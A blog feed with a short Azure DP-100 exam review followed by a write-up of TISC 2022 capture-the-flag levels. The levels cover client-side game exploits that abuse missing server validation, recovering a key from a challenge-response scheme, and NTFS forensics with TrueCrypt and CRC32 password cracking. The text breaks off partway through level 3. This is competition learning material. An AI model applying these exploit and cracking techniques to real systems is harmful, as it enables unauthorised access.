DEV Community: Terence Chan Zun Mun

Microsoft Certified: Azure Data Scientist Associate DP-100 Review

Terence Chan Zun Mun — Sun, 19 Feb 2023 16:21:01 +0000

Back in November last year, I did the Microsoft Learn Cloud Skills Challenge 2022. It was a challenge where you can get a free exam voucher provided you complete 1 chosen Cloud Challenge by November 9.

Recently I finally secured the free exam and a free certificate. Here's how I did it.

Study Plan

After doing the AI Challenge, I put the exam on hold till mid January. By then I needed a refresher on the course materials. I decided on the AI exam as I wanted to improve my ML skills. It is also one of the few exams offered which could directly lead to a certificate

I went with a Udemy course, watching the course videos. It familiarised myself with the platform. I would say it ended up not helping much else though. In fact, it didn't cover some topics.

One common thing I also saw online is that many of the courses online may also not be accurate or up to date, as Microsoft has depreciated many functions and changed some features. In the end, I realised the best resource is still Microsoft's own online learning platform as it covers all the topics. I reread it through briefly before the exam and it helped me (the differential privacy section as well as explanations sections helped)

However, I was also recommended to buy an eBook with past exam questions. Its called Microsoft-Certified-Scientist-Associate-DP-100. This is something I would highly recommend. The questions delve into specific and technical details. Keep in mind these technical details as even if the questions aren't exactly the same, the concepts and details you learn from the boom

If I were to study for it again, I would

Focus on the materials on the Microsoft Learn Platform
Read the book
Familiarise yourself with the ML Workspace (not necessary but still good to do)

Exam

I did my exam at home through the Pearson Vue online system. There were 50 MCQ questions. About 5 questions are part of a case study that you cannot go back to review after answering.

You cannot bring in physical paper. You also cannot go to the toilet once the exam started, so make sure to do so

Other than that, if you read from the book, most of the questions are actually very similar/ the exact same.

Quite a few questions were on code (what functions do what), a few on ML concepts (epsilon in differential privacy). There weren't too much questions involving the platform's UI.

They may test external libraries such as mlflow for experiments, not just those limited to their own azureml library

Results

Immediately after I ended the exam, they gave me my results. I passed the exam!

Overall my thoughts on the exam is that it is a relatively good exam for learning cloud ML concepts. I may use Azure's ML platform in the future with this certificate

The TISC 2022 Writeup

Terence Chan Zun Mun — Thu, 15 Sep 2022 13:06:38 +0000

I spent some time over the 2 weeks doing the CSIT The InfoSecurity Challenge.

Overall I think I did decent, as I could get the Level 4 Badge. Out of the 213 who got points, I was in the 59th position.

Here are my writeups

Level 1

Solution

Firstly, source code is given, so I started reading it.

It includes both the client and server code

(base) [hacker@hackerbook src]$ ls
Dockerfile  PLEASE_READ.txt  client  core  docker-compose.yml  flag.txt  main.py  poetry.lock  pyproject.toml  requirements.txt  run_server.py  server
(base) [hacker@hackerbook src]$

From the looks of the Dockerfile, there's a flag file on the server

COPY --from=builder /venv /venv
COPY flag.txt /
COPY . /app

RUN rm /app/flag.txt

RUN adduser -u 5678 --disabled-password --gecos "" appuser && chown -R appuser /app

RUN chown root:appuser /flag.txt
RUN chmod 440 /flag.txt

...

Basic Analysis

Server Code

The main server code is in run_server.py. It imports several libraries from the server folder

from typing import Optional

from core.models import Command
from server import GameServer
from server.service import (
    BattleService,
    BuyPotionService,
    BuySwordService,
    ViewStatsService,
    WorkService,
)

server = GameServer.create()


def execute(command: Optional[Command]):
    match command:
        case Command.BATTLE:
            server.run(BattleService(server=server))
        case Command.VIEW_STATS:
            server.run(ViewStatsService(server=server))
        case Command.WORK:
            server.run(WorkService(server=server))
        case Command.BUY_SWORD:
            server.run(BuySwordService(server=server))
        case Command.BUY_POTION:
            server.run(BuyPotionService(server=server))
        case Command.EXIT:
            server.exit()


while True:
    execute(server.recv_command())

Looking at the files in the server folder, we can see where they read the file in server/gameserver.py

@dataclass
class GameServer:
    connection: NetClient
    game: Game

    ...

    def recv_command(self) -> Optional[Command]:
        try:
            return Command(self.__recv())
        except ValueError:
            return None

    ...

    def send_flag(self):
        with open("/flag.txt", "r") as f:
            self.__send(f.read())

I tried to look through all the files for where the send_flag function is called (by searching for send_flag)

(base) [hacker@hackerbook src]$ grep -rnw ./ -e 'send_flag'
./server/service/battleservice.py:55:        self.server.send_flag()
./server/gameserver.py:50:    def send_flag(self):
(base) [hacker@hackerbook src]$

In server/service/battleservice.py, is the battle code. The flag is called when the battle is won and when there is no next boss.

from __future__ import annotations

from typing import TYPE_CHECKING, Optional

from core.models import Command, CommandHistorian, Result

if TYPE_CHECKING:
    from server import GameServer


class BattleService:

...

    def run(self):
        self.__send_next_boss()

        while True:
            self.history.log_commands_from_str(self.server.recv_command_str())

            match self.history.latest:
                case Command.ATTACK | Command.HEAL:
                    self.history.log_command(Command.BOSS_ATTACK)
                case Command.VALIDATE:
                    break
                case Command.RUN:
                    return
                case _:
                    self.server.exit(1)

        match self.__compute_battle_outcome():
            case Result.PLAYER_WIN_BATTLE:
                self.__handle_battle_win()
                return
            case Result.BOSS_WIN_BATTLE:
                self.server.exit()
            case _:
                self.server.exit(1)

    def __handle_battle_win(self):
        self.server.game.remove_next_boss()
        if self.__boss_available_for_next_battle():
            self.server.send_result(Result.VALIDATED_OK)
            return
        self.server.send_result(Result.OBTAINED_FLAG)
        self.server.send_flag()
        self.server.exit()

    def __boss_available_for_next_battle(self) -> bool:
        return not (self.server.game.next_boss is None)

...

Hmm there's some unexpected code

Core Code

I first read core/game.py to know more about the class Game. It suggests that there are a list of bosses from a json file. Most likely the list on the server is hidden

import json
import sys
from dataclasses import dataclass, field
from typing import List, Optional

from core.config import BOSS_DATA_FILE
from core.models.boss import Boss
from core.models.player import Player


@dataclass
class Game:
    bosses: List[Boss]
    player: Player = field(default_factory=Player)

    @property
    def next_boss(self) -> Optional[Boss]:
        try:
            return self.bosses[0]
        except IndexError:
            return None

    @classmethod
    def create(cls) -> "Game":
        bosses = Game.__load_bosses(BOSS_DATA_FILE)

        if len(bosses) == 0:
            sys.exit(-1)

        return cls(bosses=bosses)

    def remove_next_boss(self):
        self.bosses = self.bosses[1:]

    @staticmethod
    def __load_bosses(filename: str) -> List[Boss]:
        with open(filename, "r") as f:
            return [
                Boss(**boss_data, max_hp=boss_data["hp"])
                for boss_data in json.load(f)
            ]

I also looked at the player code, one interesting thing is that

More swords are basically useless, as they will still deal 2 damage

from __future__ import annotations

import json
from dataclasses import dataclass
from typing import TYPE_CHECKING

if TYPE_CHECKING:
    from core.models.boss import Boss

from core.config import BASE_ATTACK, POTION_POTENCY, SWORD_ATTACK_BONUS


@dataclass
class Player:
    hp: int = 10
    max_hp: int = 10
    gold: int = 0
    sword: int = 0
    potion: int = 0

    @property
    def attack(self) -> int:
        return BASE_ATTACK + self.__compute_bonus_attack()

    @property
    def is_alive(self) -> bool:
        return self.hp > 0

    @property
    def is_dead(self) -> bool:
        return not self.is_alive

    @property
    def lost_hp(self) -> int:
        return self.max_hp - self.hp

    def receive_attack_from(self, attacker: "Boss"):
        self.hp -= attacker.attack

    def use_potion(self):
        if not self.__has_potion():
            return
        self.potion -= 1
        self.hp = min(self.hp + POTION_POTENCY, self.max_hp)

    @classmethod
    def from_json(cls, data: str) -> "Player":
        return cls(**json.loads(data))

    def to_json(self) -> str:
        return json.dumps(self.__dict__)

    def __compute_bonus_attack(self) -> int:
        if not self.__has_sword():
            return 0
        return SWORD_ATTACK_BONUS

    def __has_sword(self) -> bool:
        return self.sword > 0

    def __has_potion(self) -> bool:
        return self.potion > 0

    def __str__(self):
        return (
            f"HP:{self.hp}/{self.max_hp}\n"
            + f"ATTACK:{self.attack}\n"
            + f"GOLD:{self.gold}\n"
            + f"POTIONS:{self.potion}"
        )

Client Code

I tried looking at the client code, which is kinda weird. I ended up stumbling on src/client/event/battleevent.py I wanted to find if there's anything client side that doesn't sync with server side. Maybe we could exploit that.

From the looks of it the client side initialises everything separately from the server. It uses new models, and does not always update from the server.

from typing import Optional

from client import GameClient
from client.error import Error
from client.ui import screens
from core.models import Boss, Command, Result


class BattleEvent:
    def __init__(self, client: GameClient) -> None:
        self.client = client
        self.player = client.player

    def run(self):
        self.boss: Boss = self.client.fetch_next_boss()

        while True:
            self.__display()

            match self.__get_battle_command():
                case Command.ATTACK:
                    self.__attack_boss()
                    if self.boss.is_dead:
                        break
                case Command.HEAL:
                    self.__use_potion()
                case Command.RUN:
                    self.client.send_command(Command.RUN)
                    return
                case _:
                    continue

            self.player.receive_attack_from(self.boss)
            if self.player.is_dead:
                break

        self.client.send_command(Command.VALIDATE)

        if self.player.is_dead:
            self.__handle_death()

        match self.client.fetch_result():
            case Result.VALIDATED_OK:
                screens.display_boss_slain_screen()
                return
            case Result.OBTAINED_FLAG:
                screens.display_flag_screen(self.client.fetch_flag())
                self.client.exit()
            case _:
                screens.display_error(Error.RECEIVED_MALFORMED_RESULT)
                self.client.exit(1)

    def __use_potion(self):
        self.client.send_command(Command.HEAL)
        self.player.use_potion()

    def __attack_boss(self):
        self.client.send_command(Command.ATTACK)
        self.boss.receive_attack_from(self.player)

    def __handle_death(self):
        screens.display_game_over_screen()
        self.client.exit()

    def __display(self):
        screens.display_battle_screen(player=self.player, boss=self.boss)

    def __get_battle_command(self) -> Optional[Command]:
        match input():
            case "1":
                return Command.ATTACK
            case "2":
                return Command.HEAL
            case "3":
                return Command.RUN
            case _:
                return None

Discrepancy Found between Client & Server Events

Battle

There are generally no discrepancies, as shown in the codes above.

Generally after an attack command, the server will register an extra boss attack command on their side too.

    def run(self):
        self.__send_next_boss()

        while True:
            self.history.log_commands_from_str(self.server.recv_command_str())

            match self.history.latest:
                case Command.ATTACK | Command.HEAL:
                    self.history.log_command(Command.BOSS_ATTACK)
                case Command.VALIDATE:
                    break
                case Command.RUN:
                    return
                case _:
                    self.server.exit(1)

Shop

The client side code client/event/shopevent.py only handles sending the commands, and does not update the local player model.

The server side codes server/event/buyswordservice.py and server/event/buypotionservice.py generally handle the main validation, which only checks if the player has enough gold to buy.

Unlimited Gold Exploit

After some digging, and checking each of the potential events, I found out discrepancies between the work service.

The Server code does not do any validation in server/event/workservice.py

from __future__ import annotations

from typing import TYPE_CHECKING

from core.config import WORK_SALARY

if TYPE_CHECKING:
    from server import GameServer


class WorkService:
    def __init__(self, server: GameServer):
        self.server = server

    def run(self):
        self.server.game.player.gold += WORK_SALARY

The Client code does validation in client/event/workevent.py.

from random import random

from client import GameClient
from client.ui import screens
from core.models import Command

CREEPER_ENCOUNTER_CHANCE = 0.2


class WorkEvent:
    def __init__(self, client: GameClient) -> None:
        self.client = client

    def run(self):
        if random() <= CREEPER_ENCOUNTER_CHANCE:
            self.__die_to_creeper()
        self.__mine_safely()

    def __die_to_creeper(self):
        screens.display_creeper_screen()
        screens.display_game_over_screen()
        self.client.exit()

    def __mine_safely(self):
        screens.display_working_screen()
        self.client.send_command(Command.WORK)

Since the client side is something we can control, I reduced the CREEPER_ENCOUNTER_CHANCE to 0. This allows us to get infinite gold. I also removed the display working screen because I can.

My modified code is here

from random import random

from client import GameClient
from client.ui import screens
from core.models import Command

CREEPER_ENCOUNTER_CHANCE = 0 #.2


class WorkEvent:
    def __init__(self, client: GameClient) -> None:
        self.client = client

    def run(self):
        if random() <= CREEPER_ENCOUNTER_CHANCE:
            self.__die_to_creeper()
        self.__mine_safely()

    def __die_to_creeper(self):
        screens.display_creeper_screen()
        screens.display_game_over_screen()
        self.client.exit()

    def __mine_safely(self):
        #screens.display_working_screen()
        self.client.send_command(Command.WORK)

Running the Client Code

Unlimited gold exploit can be used to increase number of potions, but not number of swords

Among the bosses is one with attack 50, which instant kills

Another Exploit - Command Interpretation

When checking for the battle events, as I want to bypass the attack power restriction, I noticed the client side code parsed the commands weirdly. Why commands instead of command

    def run(self):
        self.__send_next_boss()

        while True:
            self.history.log_commands_from_str(self.server.recv_command_str()) # Should be log_command_from_str

            match self.history.latest:
                case Command.ATTACK | Command.HEAL:
                    self.history.log_command(Command.BOSS_ATTACK)
                case Command.VALIDATE:
                    break
                case Command.RUN:
                    return
                case _:
                    self.server.exit(1)

If you check the CommandHistorian class used from core/models/command.py, you notice that the function used, log_commands_from_str to parse the commands actually can parse more than 1 command at once

@dataclass
class CommandHistorian:
    commands: List[Command] = field(default_factory=list)

    def log_command(self, command: Command):
        self.commands.append(command)

    def log_commands(self, commands: List[Command]):
        self.commands.extend(commands)

    def log_command_from_str(self, command_str: str):
        self.log_command(Command(command_str))

    def log_commands_from_str(self, commands_str: str):
        self.log_commands(
            [Command(command_str) for command_str in commands_str.split()]
        )

    ...

I modified the function in battleevent.py to send more than 1 command

    def __attack_boss(self):
        #self.client.send_command(Command.ATTACK)
        value = " ".join(["ATTACK" for i in range(500)])
        self.client._GameClient__send(value)
        for i in range(500):self.boss.receive_attack_from(self.player)

Just run python3 main.py --host chal00bq3ouweqtzva9xcobep6spl5m75fucey.ctf.sg --port 18261, keep attacking the bosses, and you should get the flag

Flag

TISC{L3T5_M33T_4G41N_1N_500_Y34R5_96eef57b46a6db572c08eef5f1924bc3}

Level 2

Easy Challenge, just basic math lol

https://api.tisc.csit-events.sg/file?id=cl6j1u5ua09al0838dm6l6udp&name=2WKV_Whitepaper.pdf

Solution

Matrix Multiplication

On reading the PDF document, you can find the code for the server and a brief explanation.

The code generates an 8x8 matrix SECRET_KEY. You can provide challenge to get a response 8 times. Then they give you the challenge inputvector, and you are supposed to return the correct response input vector 8 times. If all is correct you are verified and you get the flag.

Refresher on matrix multiplication (Secondary School topic)

We can give a vector with only 1 value set to 1, (eg. 10000000) to find 8 corresponding values in the SECRET_KEY matrix. We can repeat this 8 times to get the entire matrix

Solution Script and Command Output

#!/usr/bin/python

"""
# Answers
10000000
01000000
00100000
00010000
00001000
00000100
00000010
00000001
"""

responses = """
00111100
00100010
10010110
11111011
11110001
00011001
10010110
00001100
""".strip().split("\n")

import numpy as np

def strtovec(s, rows=8, cols=1):
  return np.fromiter(list(s), dtype="int").reshape(rows, cols)

SKEY = [ [0 for j in range(8)] for i in range(8)]  
for i in range(len(responses)): # lines
  for j in range(8): 
    SKEY[j][i] = int(responses[i][j])

# for i in SKEY: print(i) # Visualise
SECRET_KEY = np.array(SKEY)


for i in range(8):
  input_vec = strtovec(input("InputVector: "))
  answer_vec = (SECRET_KEY @ input_vec) & 1
  output = ""
  for i in answer_vec:
    output += str(i[0])
  print(output)

(base) [hacker@hackerbook Level 2]$ python3 solution.py 
InputVector: 10010100
11011110
InputVector: 01010111
01011010
InputVector: 00000111
10000011
InputVector: 00011011
10010000
InputVector: 11110101
01100110
InputVector: 00100011
00001100
InputVector: 10100111
00101001
InputVector: 10110000
01010001
(base) [hacker@hackerbook Level 2]$

[hacker@hackerbook src]$ nc chal00bq3ouweqtzva9xcobep6spl5m75fucey.ctf.sg 56765

 ::::::::        :::       :::     :::     :::   :::
:+:    :+:       :+:       :+:   :+: :+:   :+:   :+:
      +:+        +:+       +:+  +:+   +:+   +:+ +:+
    +#+          +#+  +:+  +#+ +#++:++#++:   +#++:
  +#+            +#+ +#+#+ +#+ +#+     +#+    +#+
 #+#              #+#+# #+#+#  #+#     #+#    #+#
##########         ###   ###   ###     ###    ###

:::    ::: :::::::::: :::   :::          :::               :::
:+:   :+:  :+:        :+:   :+:         :+:                 :+:
+:+  +:+   +:+         +:+ +:+         +:+                   +:+
+#++:++    +#++:++#     +#++:         +#+    +#++:++#++:++    +#+
+#+  +#+   +#+           +#+           +#+                   +#+
#+#   #+#  #+#           #+#            #+#                 #+#
###    ### ##########    ###             ###              ###

:::     ::: :::::::::: :::::::::  ::::::::::: :::::::::: :::   :::
:+:     :+: :+:        :+:    :+:     :+:     :+:        :+:   :+:
+:+     +:+ +:+        +:+    +:+     +:+     +:+         +:+ +:+
+#+     +:+ +#++:++#   +#++:++#:      +#+     :#::+::#     +#++:
 +#+   +#+  +#+        +#+    +#+     +#+     +#+           +#+
  #+#+#+#   #+#        #+#    #+#     #+#     #+#           #+#
    ###     ########## ###    ### ########### ###           ###

=============
Challenge Me!
=============
Challenge Me #01 <-- 10000000
01000000
00100000
00010000
00001000
00000100
00000010
00000001
My Response --> 00111100
Challenge Me #02 <-- My Response --> 00100010
Challenge Me #03 <-- My Response --> 10010110
Challenge Me #04 <-- My Response --> 11111011
Challenge Me #05 <-- My Response --> 11110001
Challenge Me #06 <-- My Response --> 00011001
Challenge Me #07 <-- My Response --> 10010110
Challenge Me #08 <-- My Response --> 00001100
==============
Challenge You!
==============
Challenge You #01 --> 10010100
Your Response <-- 11011110
Challenge You #02 --> 01010111
Your Response <-- 01011010
Challenge You #03 --> 00000111
Your Response <-- 10000011
Challenge You #04 --> 00011011
Your Response <-- 10010000
Challenge You #05 --> 11110101
Your Response <-- 01100110
Challenge You #06 --> 00100011
Your Response <-- 00001100
Challenge You #07 --> 10100111
Your Response <-- 00101001
Challenge You #08 --> 10110000
Your Response <-- 01010001
========================
All challenges passed :)
========================
=================================================================
Here is your flag: TISC{d0N7_R0lL_Ur_0wN_cRyp70_7a25ee4d777cc6e9}
=================================================================
[hacker@hackerbook src]$

Flag

TISC{d0N7_R0lL_Ur_0wN_cRyp70_7a25ee4d777cc6e9}

Level 3 - Part 1

Solution

Mounting

This looks like the image of a partition https://superuser.com/questions/1502676/what-are-the-hidden-sectors-in-the-output-of-the-file-command-for-partitions

If cannot mount, run testdisk to fix the boot sector

[hacker@hackerbook tmp]$ file PATIENT0 
PATIENT0: DOS/MBR boot sector, code offset 0x52+2, OEM-ID "NTFS    ", sectors/cluster 8, Media descriptor 0xf8, sectors/track 0, FAT (1Y bit by descriptor); NTFS, physical drive 0xab3566f7, sectors 12287, $MFT start cluster 4, $MFTMirror start cluster 767, bytes/RecordSegment 2^(-1*246), clusters/index block 1, serial number 05c66c6b160cddda1
[hacker@hackerbook tmp]$ mkdir /tmp/t
[hacker@hackerbook tmp]$ sudo mount PATIENT0 /tmp/t
[sudo] password for hacker: 
[hacker@hackerbook tmp]$ cd /tmp/t
[hacker@hackerbook t]$ ls -al
total 12
drwxrwxrwx  1 root root 4096 Aug 20 01:37 .
drwxrwxrwt 17 root root  540 Aug 27 01:32 ..
-rwxr-xr-x  1 root root 6049 Aug 20 00:40 message.png
[hacker@hackerbook t]$

I used an image to text converter here

GIXFI2DJOJZXI6JAMZXXEIDUNBSSAZTMMFTT6ICHN4QGM2LOMQQHI2DFEBZXI4TFMFWS4CQ=

I then used cyberchef to identify it was base32, and then convert it as such.

[hacker@hackerbook t]$ echo "GIXFI2DJOJZXI6JAMZXXEIDUNBSSAZTMMFTT6ICHN4QGM2LOMQQHI2DFEBZXI4TFMFWS4CQ=" | base32 -d
2.Thirsty for the flag? Go find the stream.
[hacker@hackerbook t]$

Autopsy

┌──(kali㉿kali)-[/tmp]
└─$ tsk_recover PATIENT0 files      
Files Recovered: 1

┌──(kali㉿kali)-[/tmp]
└─$ ls files                                        
broken.pdf

┌──(kali㉿kali)-[/tmp]
└─$

┌──(kali㉿kali)-[/tmp]
└─$ exiftool /tmp/broken.pdf 
ExifTool Version Number         : 12.36
File Name                       : broken.pdf
Directory                       : /tmp
File Size                       : 499 KiB
File Modification Date/Time     : 2022:08:27 05:24:56-04:00
File Access Date/Time           : 2022:08:27 05:24:57-04:00
File Inode Change Date/Time     : 2022:08:27 05:24:56-04:00
File Permissions                : -rwxr-xr-x
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.7
Linearized                      : No
Author                          : user
Create Date                     : 2022:08:20 03:35:28+10:00
Modify Date                     : 2022:08:20 03:35:28+10:00
Producer                        : Microsoft: Print To PDF
Title                           : Microsoft Word - Document1
Page Count                      : 1

┌──(kali㉿kali)-[/tmp]
└─$

File Stream

When I read the word stream, I immediately thought of file stream, which lead me to this:
https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams

Clues

The BPB is broken, can you fix it?
Thirsty for the flag? Go find the stream.
Are these True random bytes for Cryptology
If you need a password, the original reading of the BPB was actually Checked and ReChecked 32 times!

Googling for terms

I assume its about analysing the BIOS Parameter Blocks. Now need to find the term to do so.

Analysing BPB

I opened the file in a hex editor and tried to check on the BIOS Parameter Blocks

https://en.wikipedia.org/wiki/NTFS#Partition_Boot_Sector_(PBS)

Comparison shows 0x18, 0x1a, 0x1c values are 0

https://www.google.com/search?q=The+number+of+disk+sectors+in+a+drive+track.&rlz=1C1ONGR_enSG945SG945&sourceid=chrome&ie=UTF-8

0x28 is diff but its because its the partition size, 0x48 diff because unique, 0x20 is diff but its useless

End of Sector Marking

According to Wikipedia, Sector 1 0x20

The Byte Offset 0x20 is supposed to be all 00, while 0x24 is supposed to be 80 00 80 00 (Little Endian, causing things to be reversed. However, in the file they are different, as shown.

Selecting those 4 bytes and wrapping them gives the flag

Flag

TISC{f76635ab}

Level 3 - Part 2

Solution - Continued

Looking at Hints 2 & 3, you can infer that the solution is TrueCrypt

Clue 4 Capitalises the letters C, R, C and includes the number 32, suggesting the algorithm is CRC32.

I fixed the disk image using the testdisk command. Opening the file with that command, I then fixed the boot sector (since the corrupted bytes are there). This is to allow us to mount the image.

I mounted the disk image in Windows using OSFMount

I downloaded the NTFS Data Stream message.png:$RAND using the AlternateStreamView Program. This is to extract the stream properly. I was stuck on extracting it through Autopsy, and it didn't extract the volume properly.

Afterwards, I removed the text characters at the start. They are likely data added on to the initial data.

Used f76635ab as password (The Flag)

Inside the volume has this image

CRC32 Cracking

I downloaded a CRC32 cracking program and used it to crack the modified bytes. I modified the program to crack for the specific situation

┌──(kali㉿kali)-[/tmp]
└─$ git clone https://github.com/theonlypwner/crc32.git                                                                                              
Cloning into 'crc32'...
remote: Enumerating objects: 53, done.
remote: Counting objects: 100% (34/34), done.
remote: Compressing objects: 100% (19/19), done.
remote: Total 53 (delta 13), reused 30 (delta 11), pack-reused 19
Receiving objects: 100% (53/53), 43.08 KiB | 6.15 MiB/s, done.
Resolving deltas: 100% (19/19), done.

┌──(kali㉿kali)-[/tmp]
└─$ cd crc32                                                     

┌──(kali㉿kali)-[/tmp/crc32]
└─$ ls   
crc32.py  LICENSE.txt  README.md  test_data.py  test.py

┌──(kali㉿kali)-[/tmp/crc32]
└─$ mousepad crc32.py

┌──(kali㉿kali)-[/tmp/crc32]
└─$ python crc32.py reverse 0xf76635ab > gen                                                                                                                    1 ⨯ 1 ⚙

┌──(kali㉿kali)-[/tmp/crc32]
└─$

Here are the modifications I made to crc32.py

def reverse_callback():
    # initialize tables
    init_tables(get_poly())
    # find reverse bytes
    desired = parse_dword(args.desired)
    accum = parse_dword(args.accum)
    # 4-byte patch
    patches = findReverse(desired, accum)
    for patch in patches:
        text = ''
        if all(p in permitted_characters for p in patch):
            text = '{}{}{}{} '.format(*map(chr, patch))
        out('4 bytes: {}{{0x{:02x}, 0x{:02x}, 0x{:02x}, 0x{:02x}}}'.format(text, *patch))
        checksum = calc(patch, accum)
        out('verification checksum: 0x{:08x} ({})'.format(
            checksum, 'OK' if checksum == desired else 'ERROR'))

    def print_permitted_reverse(patch):
            patches = findReverse(desired, calc(patch, accum))
            for last_4_bytes in patches:
                if all(p in permitted_characters for p in last_4_bytes):
                    patch2 = patch + last_4_bytes
                    out('{} bytes: {} ({})'.format(
                        len(patch2),
                        ''.join(map(chr, patch2)),
                        'OK' if calc(patch2, accum) == desired else 'ERROR'))

    # 5-byte alphanumeric patches
    for i in permitted_characters:
        print_permitted_reverse((i,))
    # 6-byte alphanumeric patches
    for i in permitted_characters:
        for j in permitted_characters:
            print_permitted_reverse((i, j))
    # 7-byte alphanumeric patches
    for i in permitted_characters:
        for j in permitted_characters:
            for k in permitted_characters:
                print_permitted_reverse((i, j, k))
    # 9-byte
    for i in permitted_characters:
        for j in permitted_characters:
            for k in permitted_characters:
                for x in permitted_characters:
                        y = ord('c')
                        print_permitted_reverse((y, i, j, k, x))

What came out was a list of potential passwords, which if passed though CRC32, could produce the modified bytes. One of the entries, c01lis1on, seemed interesting.

PPT File

Keying in c01lis1on as the password, I get flag.ppsm, which is a PowerPoint presentation.

Opening it gives me a tip on how to get the flag

I then extracted the mp3 file from the PowerPoint Slide.

┌──(kali㉿kali)-[~]
└─$ cp /media/sf_Stuff/flag.ppsm /tmp

┌──(kali㉿kali)-[~]
└─$ file /tmp/flag.ppsm 
/tmp/flag.ppsm: Microsoft PowerPoint 2007+

┌──(kali㉿kali)-[~]
└─$ cd /tmp                          

┌──(kali㉿kali)-[/tmp]
└─$ dtrx flag.ppsm         
dtrx: ERROR: could not handle flag.ppsm
dtrx: ERROR: not a known archive type

┌──(kali㉿kali)-[/tmp]
└─$ cp flag.ppsm flag.zip                                                                                                                                           1 ⨯

┌──(kali㉿kali)-[/tmp]
└─$ dtrx flag.zip 

┌──(kali㉿kali)-[/tmp]
└─$ cd flag              

┌──(kali㉿kali)-[/tmp/flag]
└─$ ls                         
'[Content_Types].xml'   docProps   ppt   _rels

┌──(kali㉿kali)-[/tmp/flag]
└─$ ls -alR                    
.:
total 24
drwx------  5 kali kali 4096 Sep  8 08:47  .
drwxrwxrwt 18 root root 4096 Sep  8 08:47  ..
-rw-r--r--  1 kali kali 3273 Jan  1  1980 '[Content_Types].xml'
drwxr-xr-x  2 kali kali 4096 Sep  8 08:47  docProps
drwxr-xr-x  8 kali kali 4096 Sep  8 08:47  ppt
drwxr-xr-x  2 kali kali 4096 Sep  8 08:47  _rels

./docProps:
total 28
drwxr-xr-x 2 kali kali  4096 Sep  8 08:47 .
drwx------ 5 kali kali  4096 Sep  8 08:47 ..
-rw-r--r-- 1 kali kali  1299 Jan  1  1980 app.xml
-rw-r--r-- 1 kali kali   644 Jan  1  1980 core.xml
-rw-r--r-- 1 kali kali 11197 Jan  1  1980 thumbnail.jpeg

./ppt:
total 48
drwxr-xr-x 8 kali kali 4096 Sep  8 08:47 .
drwx------ 5 kali kali 4096 Sep  8 08:47 ..
drwxr-xr-x 2 kali kali 4096 Sep  8 08:47 media
-rw-r--r-- 1 kali kali 3380 Jan  1  1980 presentation.xml
-rw-r--r-- 1 kali kali  816 Jan  1  1980 presProps.xml
drwxr-xr-x 2 kali kali 4096 Sep  8 08:47 _rels
drwxr-xr-x 3 kali kali 4096 Sep  8 08:47 slideLayouts
drwxr-xr-x 3 kali kali 4096 Sep  8 08:47 slideMasters
drwxr-xr-x 3 kali kali 4096 Sep  8 08:47 slides
-rw-r--r-- 1 kali kali  182 Jan  1  1980 tableStyles.xml
drwxr-xr-x 2 kali kali 4096 Sep  8 08:47 theme
-rw-r--r-- 1 kali kali  810 Jan  1  1980 viewProps.xml

./ppt/media:
total 1112
drwxr-xr-x 2 kali kali   4096 Sep  8 08:47 .
drwxr-xr-x 8 kali kali   4096 Sep  8 08:47 ..
-rw-r--r-- 1 kali kali  16169 Jan  1  1980 image1.png
-rw-r--r-- 1 kali kali 147982 Jan  1  1980 image2.jpg
-rw-r--r-- 1 kali kali 961443 Jan  1  1980 media1.mp3

./ppt/_rels:
total 12
drwxr-xr-x 2 kali kali 4096 Sep  8 08:47 .
drwxr-xr-x 8 kali kali 4096 Sep  8 08:47 ..
-rw-r--r-- 1 kali kali  976 Jan  1  1980 presentation.xml.rels

./ppt/slideLayouts:
total 72
drwxr-xr-x 3 kali kali 4096 Sep  8 08:47 .
drwxr-xr-x 8 kali kali 4096 Sep  8 08:47 ..
drwxr-xr-x 2 kali kali 4096 Sep  8 08:47 _rels
-rw-r--r-- 1 kali kali 2946 Jan  1  1980 slideLayout10.xml
-rw-r--r-- 1 kali kali 3170 Jan  1  1980 slideLayout11.xml
-rw-r--r-- 1 kali kali 3648 Jan  1  1980 slideLayout1.xml
-rw-r--r-- 1 kali kali 2891 Jan  1  1980 slideLayout2.xml
-rw-r--r-- 1 kali kali 4384 Jan  1  1980 slideLayout3.xml
-rw-r--r-- 1 kali kali 3756 Jan  1  1980 slideLayout4.xml
-rw-r--r-- 1 kali kali 6285 Jan  1  1980 slideLayout5.xml
-rw-r--r-- 1 kali kali 2223 Jan  1  1980 slideLayout6.xml
-rw-r--r-- 1 kali kali 1897 Jan  1  1980 slideLayout7.xml
-rw-r--r-- 1 kali kali 4704 Jan  1  1980 slideLayout8.xml
-rw-r--r-- 1 kali kali 4623 Jan  1  1980 slideLayout9.xml

./ppt/slideLayouts/_rels:
total 52
drwxr-xr-x 2 kali kali 4096 Sep  8 08:47 .
drwxr-xr-x 3 kali kali 4096 Sep  8 08:47 ..
-rw-r--r-- 1 kali kali  311 Jan  1  1980 slideLayout10.xml.rels
-rw-r--r-- 1 kali kali  311 Jan  1  1980 slideLayout11.xml.rels
-rw-r--r-- 1 kali kali  311 Jan  1  1980 slideLayout1.xml.rels
-rw-r--r-- 1 kali kali  311 Jan  1  1980 slideLayout2.xml.rels
-rw-r--r-- 1 kali kali  311 Jan  1  1980 slideLayout3.xml.rels
-rw-r--r-- 1 kali kali  311 Jan  1  1980 slideLayout4.xml.rels
-rw-r--r-- 1 kali kali  311 Jan  1  1980 slideLayout5.xml.rels
-rw-r--r-- 1 kali kali  311 Jan  1  1980 slideLayout6.xml.rels
-rw-r--r-- 1 kali kali  311 Jan  1  1980 slideLayout7.xml.rels
-rw-r--r-- 1 kali kali  311 Jan  1  1980 slideLayout8.xml.rels
-rw-r--r-- 1 kali kali  311 Jan  1  1980 slideLayout9.xml.rels

./ppt/slideMasters:
total 28
drwxr-xr-x 3 kali kali  4096 Sep  8 08:47 .
drwxr-xr-x 8 kali kali  4096 Sep  8 08:47 ..
drwxr-xr-x 2 kali kali  4096 Sep  8 08:47 _rels
-rw-r--r-- 1 kali kali 12846 Jan  1  1980 slideMaster1.xml

./ppt/slideMasters/_rels:
total 12
drwxr-xr-x 2 kali kali 4096 Sep  8 08:47 .
drwxr-xr-x 3 kali kali 4096 Sep  8 08:47 ..
-rw-r--r-- 1 kali kali 1991 Jan  1  1980 slideMaster1.xml.rels

./ppt/slides:
total 16
drwxr-xr-x 3 kali kali 4096 Sep  8 08:47 .
drwxr-xr-x 8 kali kali 4096 Sep  8 08:47 ..
drwxr-xr-x 2 kali kali 4096 Sep  8 08:47 _rels
-rw-r--r-- 1 kali kali 3653 Jan  1  1980 slide1.xml

./ppt/slides/_rels:
total 12
